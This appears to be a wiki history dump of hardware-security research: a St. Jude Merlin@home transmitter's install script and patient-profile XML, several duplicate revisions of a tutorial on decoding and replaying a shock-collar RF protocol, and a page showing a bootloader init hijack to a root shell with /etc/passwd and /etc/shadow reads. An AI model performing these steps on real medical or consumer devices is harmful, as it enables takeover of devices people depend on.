export PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin

# IP address of the server from which we download the devel package using scp.
SERVER="10.16.155.27"

function download_package()
{
# Download the devel package and the md5sum.txt file
echo -e "\n==> Downloading $1 package using wget.\n"

wget ftp://REDACTED_USER:REDACTED_PASSWORD@10.16.155.27/$2/$1

if [ "$?" != 0 ]; then
echo "scp failed..."
exit 1
fi
}

/root/setdev.sh 1
/etc/init.d/tantoapp stop

if [ ! -f /etc/password_key ]; then
touch /etc/password_key
fi

echo "-----------------------------------------------------"
echo "This script will install the development package"
echo "This contains the following:"

echo " 1. gdbserver"
echo " 2. ssh server"
echo " 3. procps (contains vmstat and top)"
echo " 4. dos2unix and unix2dos"
echo " 5. ftp client"
echo " 6. mtd utilities (for diagnostics)"
echo " 7. less utility"
echo " 8. traceroute"
echo " 9. agentd"
echo " 10. monitord"
echo "-----------------------------------------------------"

sleep 2

# Test if the server is reachable
echo
echo "---- Testing server connectivity ----"
sleep 2
ping -c 3 -w 10 $SERVER

if [ "$?" != 0 ]; then
echo
echo "--- $SERVER not reachable. ---"
echo " Will try connecting anyway (some firewalls block ping requests)".
echo " Contact your network administrator if the connection fails"
sleep 2
else
echo
echo "--- Server reachable. Good! ---"
echo
fi

TMPDIR="$HOME/devel$$"
mkdir $TMPDIR

if [ "$?" != 0 ]; then
echo "unable to create temporary directory. Check if you have write"
echo "permissions in $HOME"
fi

cd $TMPDIR
# Download the development packages
echo
echo "+----------------------------------------------+"
echo "| Downloading development packages using wget. |"
echo "+----------------------------------------------+"
echo

download_package "devel-util_1.4_all.ipk" "not-so-advanced/utils/devel_packages/"

echo
echo "+---------------------------------------+"
echo "| Installing the development utilities. |"
echo "+---------------------------------------+"
echo
# The package is sane. Install it
ipkg-cl -d root install *.ipk

if [ "$?" != 0 ]; then
echo "Package installation failed"
exit 1
fi

echo
echo "+-------------------------------------------+"
echo "| Performing required config modifications. |"
echo "+-------------------------------------------+"
echo

sed '1,$s/AUTOKEYGEN=no/AUTOKEYGEN=yes/g' /etc/default/ssh > /tmp/ssh
cp -a /tmp/ssh /etc/default/ssh

echo
echo "+-------------------------------------------+"
echo "| Starting SSH Daemon . |"
echo "+-------------------------------------------+"
echo

/etc/init.d/ssh start

echo
echo "Devel package successfully installed"

cd $HOME

# delete TMPDIR
rm -rf $TMPDIR

exit 0</pre>

Sample patient profile
<pre><?xml version="1.0" encoding="UTF-8"?>
<profile:ProfileList xmlns:profile="http://www.merlin.net/PayloadProfile.xsd">
<SystemData>
<SystemInformation DeviceModel="XXXX-XX" DeviceSerialNumber="XXXXXX" NumberOfProfiles="7" PatientNotifyWindowEnd="23:00:00" PatientNotifyWindowStart="16:00:00" ProfileDate="2011-09-07" ProfileVersion="7" SchemaVersion="A" TransmitterModelNumber="EX1150" TransmitterProfileID="100899" TransmitterRequestType="PProfile" TransmitterSerialNumber="00000000" UTCServerTime="22:57:29"/>
<Controls>
<Switch name="ADETECT_DIALUP_NUM" value="Enable"/>
<Switch name="UNPAIRED_MODE" value="Disable"/>
<Switch name="ENROLLMENT_CHANGE" value="Disable"/>
<Switch name="PROFILE_SYNC_PREF" value="Enable"/>
<iSwitch name="ALLWD_UNSCHED_EVENTS" value="100"/>
<iSwitch name="NOTIFY_DELAY_ALERT" value="24"/>
<iSwitch name="NOTIFY_DELAY_FLP" value="96"/>
<iSwitch name="NOTIFY_DELAY_MED" value="0"/>
<iSwitch name="NOTIFY_DELAY_SERVER" value="0"/>
<tSwitch name="CLINIC_TYPE" value="UNKNOWN"/>
<tSwitch name="SHORT_BTN_ACTION" value="FLP"/>
<tSwitch name="LONG_BTN_ACTION" value="DCHK"/>
<tSwitch name="MERLIN_ID" value="512556937"/>
<tSwitch name="UPDATED_DEVICE_MODEL" value="1111-11"/>
<tSwitch name="UPDATED_DEVICE_SERIAL" value="999999"/>
<tSwitch name="SCHED_REF_TIME" value="2001-01-01_00-00-00"/>
<tSwitch name="VOL_CTRL_PREF" value="OFF"/>
</Controls>
</SystemData>
<PayloadProfile Type="Follow-up">
<GenerateSchedule GS_DateOfEvent="2011-09-08" GS_TimeOfEvent="09:00:00"/>
<Controls>
<Switch name="GDC2_SCHED_FLP_PREF" value="Enable"/>
<Switch name="UNSCHED_FLP_PREF" value="Enable"/>
<Switch name="SCHED_FLP_PREF" value="Disable"/>
<Switch name="CLEAR_EPIS_FLAG" value="Enable"/>
<Switch name="CLEAR_ST_FLAG" value="Disable"/>
<Switch name="CLEAR_DIAG_FLAG" value="Enable"/>
<Switch name="CLEAR_SEGM_FLAG" value="Enable"/>
</Controls>
</PayloadProfile>
<PayloadProfile Type="Device_Check">
<GenerateSchedule GS_Interval="24" GS_TimeOfEvent="09:00:00"/>
<Controls>
<Switch name="UNSCH_DCHK_PREF" value="Enable"/>
<Switch name="SCHED_DCHK_PREF" value="Disable"/>
</Controls>
</PayloadProfile>
<PayloadProfile Type="Alert_Controls">
<Controls>
<Switch name="HIGH_VRATE_EPISODE_ALERT" value="Disable"/>
<Switch name="V_AUTOCAP_ALERT" value="Disable"/>
<Switch name="ACAP_CONFIRM_ALERT" value="Disable"/>
<Switch name="RVCAP_CONFIRM_ALERT" value="Disable"/>
<Switch name="LVCAP_CONFIRM_ALERT" value="Disable"/>
<Switch name="HIGH_VRATE_EPISODE_NOT" value="Disable"/>
<Switch name="V_AUTOCAP_NOT" value="Disable"/>
<Switch name="ACAP_CONFIRM_NOT" value="Disable"/>
<Switch name="RVCAP_CONFIRM_NOT" value="Disable"/>
<Switch name="LVCAP_CONFIRM_NOT" value="Disable"/>
<Switch name="CONG_MON_ALERT" value="Enable"/>
<Switch name="DEV_IN_MRI_MODE_ALERT" value="Disable"/>
<Switch name="DEV_RST_MRI_MODE_ALERT" value="Disable"/>
<Switch name="EARLY_DEPLETION_DETECTED_ALERT" value="Enable"/>
<Switch name="PER_BIV_PACING_ALERT" value="Disable"/>
<Switch name="PER_RV_PACING_ALERT" value="Enable"/>
<Switch name="CONG_MON_NOT" value="Disable"/>
<Switch name="DEV_IN_MRI_MODE_NOT" value="Disable"/>
<Switch name="DEV_RST_MRI_MODE_NOT" value="Disable"/>
<Switch name="EARLY_DEPLETION_DETECTED_NOT" value="Disable"/>
<Switch name="PER_BIV_PACING_NOT" value="Disable"/>
<Switch name="PER_RV_PACING_NOT" value="Disable"/>
<Switch name="LFDA_TIMEOUT_ALERT" value="Enable"/>
<Switch name="ST_TYPE_2_ALERT" value="Enable"/>
<Switch name="VT_VF_3_PER_DAY_ALERT" value="Enable"/>
<Switch name="THERAPY_EXHAUSTED_ALERT" value="Enable"/>
<Switch name="HV_THERAPY_UNSUC_ALERT" value="Enable"/>
<Switch name="VT_VF_OCCURED_ALERT" value="Enable"/>
<Switch name="LFDA_TIMEOUT_NOT" value="Disable"/>
<Switch name="ST_TYPE_2_NOT" value="Disable"/>
<Switch name="VT_VF_3_PER_DAY_NOT" value="Disable"/>
<Switch name="THERAPY_EXHAUSTED_NOT" value="Disable"/>
<Switch name="HV_THERAPY_UNSUC_NOT" value="Disable"/>
<Switch name="VT_VF_OCCURED_NOT" value="Disable"/>
<Switch name="LFDA_NSLN_ALERT" value="Enable"/>
<Switch name="LFDA_RV_NOISE_ALERT" value="Enable"/>
<Switch name="ST_TYPE_1_ALERT" value="Enable"/>
<Switch name="LFDA_NSLN_NOT" value="Disable"/>
<Switch name="LFDA_RV_NOISE_NOT" value="Disable"/>
<Switch name="ST_TYPE_1_NOT" value="Enable"/>
<Switch name="AIMP_OOR_ALERT" value="Disable"/>
<Switch name="CCRG_LMT_ALERT" value="Enable"/>
<Switch name="DEV_EOS_ALERT" value="Disable"/>
<Switch name="DEV_ERI_ALERT" value="Enable"/>
<Switch name="DEV_EVVI_ALERT" value="Enable"/>
<Switch name="DEV_RST_ALERT" value="Enable"/>
<Switch name="HVIMP_OOR_ALERT" value="Enable"/>
<Switch name="HW_BVVI_ALERT" value="Enable"/>
<Switch name="LVIMP_OOR_ALERT" value="Disable"/>
<Switch name="OCD_ALERT" value="Enable"/>
<Switch name="SOSD_ALERT" value="Enable"/>
<Switch name="RVIMP_OOR_ALERT" value="Enable"/>
<Switch name="TTRPY_DIS_ALERT" value="Enable"/>
<Switch name="ATAF_DUR_ALERT" value="Disable"/>
<Switch name="ATAF_WK_DUR_ALERT" value="Disable"/>
<Switch name="ATAF_VRATE_ALERT" value="Disable"/>
<Switch name="ATP_RX_SUCCESS_ALERT" value="Enable"/>
<Switch name="HV_TRPY_ALERT" value="Enable"/>
<Switch name="PERCENT_BIV_THRESHOLD_ALERT" value="Disable"/>
<Switch name="PERCENT_RV_THRESHOLD_ALERT" value="Disable"/>
<Switch name="ST_MAJOR_EPISODE_ALERT" value="Disable"/>
<Switch name="TRPY_ACCEL_ALERT" value="Enable"/>
<Switch name="NOISE_REV_ALERT" value="Disable"/>
<Switch name="NSVT_EPIS_ALERT" value="Disable"/>
<Switch name="NSVF_EPIS_ALERT" value="Disable"/>
<Switch name="SPARE_1_ALERT" value="Disable"/>
<Switch name="SPARE_2_ALERT" value="Disable"/>
<Switch name="SPARE_3_ALERT" value="Disable"/>
<Switch name="SPARE_4_ALERT" value="Disable"/>
<Switch name="SPARE_5_ALERT" value="Disable"/>
<Switch name="AIMP_OOR_NOT" value="Disable"/>
<Switch name="CCRG_LMT_NOT" value="Disable"/>
<Switch name="DEV_EOS_NOT" value="Disable"/>
<Switch name="DEV_ERI_NOT" value="Disable"/>
<Switch name="DEV_EVVI_NOT" value="Disable"/>
<Switch name="DEV_RST_NOT" value="Disable"/>
<Switch name="HVIMP_OOR_NOT" value="Disable"/>
<Switch name="HW_BVVI_NOT" value="Disable"/>
<Switch name="LVIMP_OOR_NOT" value="Disable"/>
<Switch name="OCD_NOT" value="Disable"/>
<Switch name="SOSD_NOT" value="Disable"/>
<Switch name="RVIMP_OOR_NOT" value="Disable"/>
<Switch name="TTRPY_DIS_NOT" value="Disable"/>
<Switch name="ATAF_DUR_NOT" value="Disable"/>
<Switch name="ATAF_WK_DUR_NOT" value="Disable"/>
<Switch name="ATAF_VRATE_NOT" value="Disable"/>
<Switch name="ATP_RX_SUCCESS_NOT" value="Disable"/>
<Switch name="HV_TRPY_NOT" value="Disable"/>
<Switch name="PERCENT_BIV_THRESHOLD_NOT" value="Disable"/>
<Switch name="PERCENT_RV_THRESHOLD_NOT" value="Disable"/>
<Switch name="ST_MAJOR_EPISODE_NOT" value="Disable"/>
<Switch name="TRPY_ACCEL_NOT" value="Disable"/>
<Switch name="NOISE_REV_NOT" value="Disable"/>
<Switch name="NSVT_EPIS_NOT" value="Disable"/>
<Switch name="NSVF_EPIS_NOT" value="Disable"/>
<Switch name="SPARE_1_NOT" value="Disable"/>
<Switch name="SPARE_2_NOT" value="Disable"/>
<Switch name="SPARE_3_NOT" value="Disable"/>
<Switch name="SPARE_4_NOT" value="Disable"/>
<Switch name="SPARE_5_NOT" value="Disable"/>
<iSwitch name="BIV_PACING_DURATION" value="7"/>
<iSwitch name="RV_PACING_DURATION" value="7"/>
<iSwitch name="ALERT_MASK_DURATION" value="4000"/>
<iSwitch name="PERCENT_BIV_PACING" value="100"/>
<iSwitch name="PERCENT_RV_PACING" value="100"/>

</Controls>
</PayloadProfile>
<PayloadProfile Type="GDC">
<GenerateSchedule GS_Interval="1440"/>
<UploadSchedule US_Interval="168"/>
<Controls>
<Switch name="SCHED_GDC_PREF" value="Disable"/>
<Switch name="CLEAR_GDC_FLAG" value="Enable"/>
</Controls>
</PayloadProfile>
<PayloadProfile Type="Maintenance">
<UploadSchedule US_Interval="168"/>
<Controls>
<Switch name="MAINT_REBOOT_PREF" value="Disable"/>
<Switch name="MAINT_PREF" value="Enable"/>
<Switch name="RF_STAT_COLLECT" value="Disable"/>
<Switch name="STAT_DATA_UPLD_PREF" value="Enable"/>
</Controls>
</PayloadProfile>
<PayloadProfile Type="MED">
<GenerateSchedule GS_Interval="24"/>
<UploadSchedule US_Interval="7"/>
<Controls>
<Switch name="SCHED_MED_PREF" value="Enable"/>
<Switch name="SCHED_MED_WINDOW_PREF" value="Enable"/>
<iSwitch name="ACTIVE_MED_SCHEDULES" value="1"/>
<tSwitch name="MED_SCHEDULE_1" value="1100"/>
<tSwitch name="MED_SCHEDULE_2" value="0500"/>
</Controls>
</PayloadProfile>
<PayloadProfile Type="Spare">
<GenerateSchedule GS_DateOfEvent="2000-01-01" GS_Interval="0" GS_TimeOfEvent="08:00:00" GS_UnscheduledEvent="Disable" GS_WeeklyEvent="Sunday"/>
<UploadSchedule US_DateOfEvent="2000-01-01" US_Interval="0" US_TimeOfEvent="08:00:00" US_UnscheduledEvent="Disable" US_WeeklyEvent="Sunday"/>
<Controls>
<Switch name="SPARE_FLAG1" value="Disable"/>
<Switch name="SPARE_FLAG2" value="Enable"/>
<Switch name="SPARE_FLAG3" value="Disable"/>
<Switch name="SPARE_FLAG4" value="Disable"/>
<Switch name="SPARE_FLAG5" value="Disable"/>
<Switch name="SPARE_FLAG6" value="Disable"/>
<Switch name="SPARE_FLAG7" value="Disable"/>
<Switch name="SPARE_FLAG8" value="Disable"/>
<Switch name="SPARE_FLAG9" value="Disable"/>
<Switch name="SPARE_FLAG10" value="Disable"/>
<iSwitch name="SPARE_INTEGER1" value="0"/>
<iSwitch name="SPARE_INTEGER2" value="0"/>
<iSwitch name="SPARE_INTEGER3" value="0"/>
<iSwitch name="SPARE_INTEGER4" value="0"/>
<iSwitch name="SPARE_INTEGER5" value="0"/>
<iSwitch name="SPARE_INTEGER6" value="0"/>
<iSwitch name="SPARE_INTEGER7" value="0"/>
<iSwitch name="SPARE_INTEGER8" value="0"/>
<iSwitch name="SPARE_INTEGER9" value="0"/>
<iSwitch name="SPARE_INTEGER10" value="0"/>
<rSwitch name="SPARE_REAL4" value="0.0"/>
<rSwitch name="SPARE_REAL5" value="0.0"/>
<rSwitch name="SPARE_REAL6" value="0.0"/>
<rSwitch name="SPARE_REAL7" value="0.0"/>
<rSwitch name="SPARE_REAL8" value="0.0"/>
<rSwitch name="SPARE_REAL9" value="0.0"/>
<rSwitch name="SPARE_REAL10" value="0.0"/>
<rSwitch name="SPARE_REAL1" value="0.0"/>
<rSwitch name="SPARE_REAL2" value="0.0"/>
<rSwitch name="SPARE_REAL3" value="0.0"/>
<tSwitch name="SPARE_TEXT1" value=" "/>
<tSwitch name="SPARE_TEXT2" value=" "/>
<tSwitch name="SPARE_TEXT3" value=" "/>
<tSwitch name="SPARE_TEXT4" value=" "/>
<tSwitch name="SPARE_TEXT5" value=" "/>
<tSwitch name="SPARE_TEXT6" value=" "/>
<tSwitch name="SPARE_TEXT7" value=" "/>
<tSwitch name="SPARE_TEXT8" value=" "/>
<tSwitch name="SPARE_TEXT9" value=" "/>
<tSwitch name="SPARE_TEXT10" value=" "/>
</Controls>
</PayloadProfile>
</profile:ProfileList></pre>

Blind RF Signal Analysis

2017-08-07T00:50:39Z

Rjmendez: Rjmendez moved page Blind RF Signal Analysis to RF Signal Analysis

#REDIRECT [[RF Signal Analysis]]

RF Signal Analysis

2017-08-07T00:50:39Z

Rjmendez: Rjmendez moved page Blind RF Signal Analysis to RF Signal Analysis

RF Signal Analysis

2017-08-07T00:50:26Z

Rjmendez:

RF Signal Analysis

2017-08-07T00:30:23Z

Rjmendez:

This page will be to cover some basic blind RF signal analysis.

== About ==
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:

A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)

An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)

Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)

== Where to look ==

One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.

Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf

Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band

Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.

[[File:Remote.jpg|300px]]

We can throw this ID into the https://fccid.io/ site to get some details.

https://fccid.io/B4Z-RF4004-01-2

[[File:B4Z-RF400401_fccid.io.PNG|300px]]

Now we know where this device is supposed to be transmitting and we can move on to the next steps.

== How to look ==

Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.

[[File:Shock_Collar.jpg|300px]]

{{#ev:youtube|NI8U1IfQyto}}

I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.

[[File:Inspect_ook_grc.png|500px]]
[[File:Inspect_ook_gr-fosphor.png|500px]]

This absolutely looks like OOK.

Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide

== Decoding ==

Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).

[[File:Inspectrum_ook.png|500px]]

We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.

[[File:URH_waveform_demod.png|500px]]

Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.

The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.

[[File:URH_NRZ_replace.png|500px]]

The resulting packets now look like this.

[[File:Decoded_packets.png]]

If we ignore the noise on 5 and 10 we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring the entire protocol can be decoded.

[[File:Collar_protocol_packet.PNG|500px]]

== Sending our own data ==

With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete the code here. https://github.com/rjmendez/ShockCollar

User:Rjmendez

2017-08-06T22:23:07Z

Rjmendez: Rjmendez moved page User:Rjmendez to Blind RF Signal Analysis

#REDIRECT [[Blind RF Signal Analysis]]

RF Signal Analysis

2017-08-06T22:23:07Z

Rjmendez: Rjmendez moved page User:Rjmendez to Blind RF Signal Analysis

This page will be to cover some basic blind RF signal analysis.

== About ==
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:

A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)

An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)

Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)

== Where to look ==

One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.

Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf

Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band

Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.

[[File:Remote.jpg|300px]]

We can throw this ID into the https://fccid.io/ site to get some details.

https://fccid.io/B4Z-RF4004-01-2

[[File:B4Z-RF400401_fccid.io.PNG|300px]]

Now we know where this device is supposed to be transmitting and we can move on to the next steps.

== How to look ==

Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.

[[File:Shock_Collar.jpg|300px]]

{{#ev:youtube|NI8U1IfQyto}}

I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.

[[File:Inspect_ook_grc.png]]
[[File:Inspect_ook_gr-fosphor.png]]

This absolutely looks like OOK.

Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide

== Decoding ==

Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).

[[File:Inspectrum_ook.png]]

We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.

[[File:URH_waveform_demod.png]]

Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.

The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.

[[File:URH_NRZ_replace.png]]

The resulting packets now look like this.

[[File:Decoded_packets.png]]

If we ignore the noise on 5 and 10 we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring the entire protocol can be decoded.

[[File:Collar_protocol_packet.PNG]]

== Sending our own data ==

With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete the code here. https://github.com/rjmendez/ShockCollar

RF Signal Analysis

2017-08-06T22:21:42Z

Rjmendez: Created page with "This page will be to cover some basic blind RF signal analysis. == About == Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, dev..."

This page will be to cover some basic blind RF signal analysis.

== About ==
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:

A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)

An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)

Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)

== Where to look ==

One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.

Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf

Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band

Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.

[[File:Remote.jpg|300px]]

We can throw this ID into the https://fccid.io/ site to get some details.

https://fccid.io/B4Z-RF4004-01-2

[[File:B4Z-RF400401_fccid.io.PNG|300px]]

Now we know where this device is supposed to be transmitting and we can move on to the next steps.

== How to look ==

Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.

[[File:Shock_Collar.jpg|300px]]

{{#ev:youtube|NI8U1IfQyto}}

I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.

[[File:Inspect_ook_grc.png]]
[[File:Inspect_ook_gr-fosphor.png]]

This absolutely looks like OOK.

Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide

== Decoding ==

Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).

[[File:Inspectrum_ook.png]]

We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.

[[File:URH_waveform_demod.png]]

Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.

The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.

[[File:URH_NRZ_replace.png]]

The resulting packets now look like this.

[[File:Decoded_packets.png]]

If we ignore the noise on 5 and 10 we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring the entire protocol can be decoded.

[[File:Collar_protocol_packet.PNG]]

== Sending our own data ==

With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete the code here. https://github.com/rjmendez/ShockCollar

File:Remote.jpg

2017-08-06T21:46:44Z

Rjmendez:

File:Collar protocol packet.PNG

2017-08-06T21:42:40Z

Rjmendez:

File:Decoded packets.png

2017-08-06T21:42:05Z

Rjmendez:

File:URH NRZ replace.png

2017-08-06T21:41:41Z

Rjmendez:

File:URH waveform demod.png

2017-08-06T21:41:09Z

Rjmendez:

File:Inspectrum ook.png

2017-08-06T21:40:40Z

Rjmendez:

File:Inspect ook gr-fosphor.png

2017-08-06T21:39:28Z

Rjmendez:

File:Inspect ook grc.png

2017-08-06T21:39:04Z

Rjmendez:

File:Shock Collar.jpg

2017-08-06T21:37:39Z

Rjmendez:

File:B4Z-RF400401 fccid.io.PNG

2017-08-06T21:36:11Z

Rjmendez:

SJM Merlin at Home

2017-05-15T01:48:56Z

Rjmendez:

__FORCETOC__
{{Disclaimer}}
[[File:Merlin-at-home-1.jpg|100px|left|thumb]]
[[Category:Medical]]
This page will be dedicated to a general overview, descriptions, and information related to the St. Jude Medical Merlin@home Transmitter Model EX1150.

== About ==
The Merlin@home Transmitter is intended to pair with an Implantable Cardiac Defibrillator (ICD) or Pacemaker and upload the data to the Merlin.net patient care network for review by a physician.

== Disassembly ==
<gallery>
File:Merlin-front.jpg
File:Merlin-back.jpg
File:Merlin-side_usb.jpg
File:Merlin-antenna1.jpg
File:Merlin-antenna2.jpg
File:Merlin-uart.jpg
File:Merlin-uart2.jpg
</gallery>

== UART ==
A Login Console is presented on UART (3.3v) at 115200 baud. The pinout for UART can be found below.

<gallery>
File:Merlin-uart.jpg
File:Merlin-uart2.jpg
</gallery>

== Exploitation ==

This device boots with the BLOB bootloader (https://sourceforge.net/projects/blob/) to a version of Montavista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. It is possible to init hijack by interrupting the bootloader.

<pre>Post device verification...
Serial2In string: ATi0
Serial2In string:
56000
Modem Post : Passed with retries = 0

Time taken by POST : [1.197000] seconds
nand_init: manuf=0x000000EC device=0x000000F1
scanning for bad blocks...
nand_check_blocks: nand_read_page() failed, addr=0x02B40000
nand_check_blocks: nand_read_page() failed, addr=0x04B20000
nand_check_blocks: nand_read_page() failed, addr=0x07660000

Consider yourself BLOBed!

blob version 2.0.5-pre2 for Tanto Basic Device
Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw
blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details.
This is free software, and you are welcome to redistribute it
under certain conditions; read the GNU GPL for details.
blob release: d20081014_platform_4_16
Memory map:
0x02000000 @ 0xc0000000 (32 MB)

ram_post executing...
Data Bus Test
Address Bus Test
Data Qualifer Test
Device Test
c0200000status_next, board type = RF board revision = (3)
c1e00000r14_svc = 0x0000034d
Autoboot in progress, press any key to stop ..
Autoboot aborted
Type "help" to get a list of commands
blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=
</pre>

We can pull some useful information from the device.

<pre>sh-2.05a# cat /etc/passwd
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
adm:*:4:4:adm:/var/adm:
lp:*:5:7:lp:/var/spool/lpd:
sync:*:6:8:sync:/bin:/bin/sync
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
halt:*:8:10:halt:/sbin:/sbin/halt
mail:*:9:11:mail:/var/spool/mail:
news:*:10:12:news:/var/spool/news:
uucp:*:11:13:uucp:/var/spool/uucp:
operator:*:12:0:operator:/root:
games:*:13:100:games:/usr/games:
ftp:*:15:14:ftp:/var/ftp:
man:*:16:100:man:/var/cache/man:
www:*:17:100:www:/var/www:
sshd:*:18:100:sshd:/var/run/sshd:
nobody:*:65534:65534:nobody:/home:/bin/sh
sh-2.05a# cat /etc/shadow
